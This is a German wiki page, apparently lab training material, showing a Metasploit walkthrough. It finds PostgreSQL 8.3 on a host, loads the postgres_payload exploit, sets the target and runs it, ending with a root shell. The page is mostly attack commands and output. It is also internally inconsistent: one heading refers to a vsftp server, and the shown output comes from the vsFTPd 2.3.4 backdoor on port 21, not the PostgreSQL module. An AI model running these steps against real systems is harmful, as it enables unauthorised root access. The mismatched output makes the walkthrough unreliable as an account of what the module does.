Metasploit postgres exploit

Aus Xinux Wiki
Version vom 19. Oktober 2022, 16:16 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „=Gefundene Version= ;<nowiki>[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7</nowiki> =Gibt es eingebaute Schwachstellen zum vsftp Server?= *m…“)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Gefundene Version

[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

Gibt es eingebaute Schwachstellen zum vsftp Server?

  • msf6 > search postgres
Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
    13  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution

Module laden

  • msf6 > use exploit/linux/postgres/postgres_payload

info

  • msf6 exploit(/linux/postgres/postgres_payload) > info

Wir müssen den RHOST setzen

  • msf6 exploit(/linux/postgres/postgres_payload) > set RHOSTS 10.0.10.105

Und Attacke

  • msf6 exploit(/linux/postgres/postgres_payload) > run
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.10.105:21 - USER: 331 Please specify the password.
[+] 10.0.10.105:21 - Backdoor service has been spawned, handling...
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
Wir haben kein Prompt aber eine Shell